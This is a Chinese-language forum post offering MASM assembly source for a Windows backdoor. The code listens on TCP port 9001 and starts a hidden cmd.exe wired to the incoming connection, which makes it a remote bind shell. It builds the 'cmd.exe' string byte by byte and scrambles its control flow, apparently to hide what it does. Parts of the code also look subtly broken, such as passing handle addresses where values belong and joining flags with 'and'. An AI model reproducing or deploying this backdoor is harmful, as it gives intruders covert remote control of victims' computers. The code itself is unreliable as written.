HanDs
管理员

[Visual Studio文章] winsock 后门源码 



.486
.model flat, STDCALL
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
.data?
.data

; ---------- tubeet vars
wsDat WSADATA <>
tooby sockaddr_in <>
tube SOCKET ?
; Client vars
Client SOCKET ?

; ---------- Redirection stuff
abc STARTUPINFO <>
xyz PROCESS_INFORMATION <>
knob HANDLE ?
;welcome db "Example backdoor", 13, 10, 0
;yay db 99, 109, 100, 46, 101, 120, 101 ; cmd.exe
yay db 8 dup (?)

.code
start:
    nop
    nop
    nop

    mov [yay+0], 99d
    mov [yay+1], 109d
    mov [yay+2], 100d
    mov [yay+3], 46d
    mov [yay+4], 101d
    mov [yay+5], 120d
    mov [yay+6], 101d
    mov [yay+7], 0

lea eax, wsDat
push eax
push 0202h
call WSAStartup
cmp eax, 0
jne exit
xor eax, eax
jmp sox

sox:
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call socket
mov tube, eax
mov knob, eax
xor eax, eax
jmp inf

next:
lea eax, knob
mov abc.hStdError, eax
jmp goodjunk
duh:
mov abc.wShowWindow, SW_HIDE
jmp cnt

strinf:
mov abc.cb, 68d
mov abc.dwFlags, STARTF_USESTDHANDLES and STARTF_USESHOWWINDOW
jmp duh

cnt:
lea eax, knob
mov abc.hStdInput, eax
lea eax, knob
mov abc.hStdOutput, eax
jmp next


inf:
mov tooby.sin_family, AF_INET
mov tooby.sin_addr, 0
push 9001d ; OVER 9000!!!
call htons
mov tooby.sin_port, ax
xor eax, eax
jmp attch

lewp:
push 1
push tube
call listen
cmp eax, SOCKET_ERROR
je exit
xor eax, eax
jmp acpt

goodjunk:
lea eax, xyz
push eax
lea eax, abc
push eax
push 0
push 0
push 0
push 1
push 0
push 0
nop
nop
lea eax, yay
push eax
push 0
call CreateProcess
xor cx, cx

acpt:
push 0
push 0
push tube
call accept
mov Client, eax

jmp strinf

attch:
push 16
lea eax, tooby
push eax
push tube
call bind
cmp eax, SOCKET_ERROR
je exit
xor eax, eax
jmp lewp

exit:
push Client
call closesocket
call WSACleanup

push 0
call ExitProcess

ret
end start


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
winsock 后门源码
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复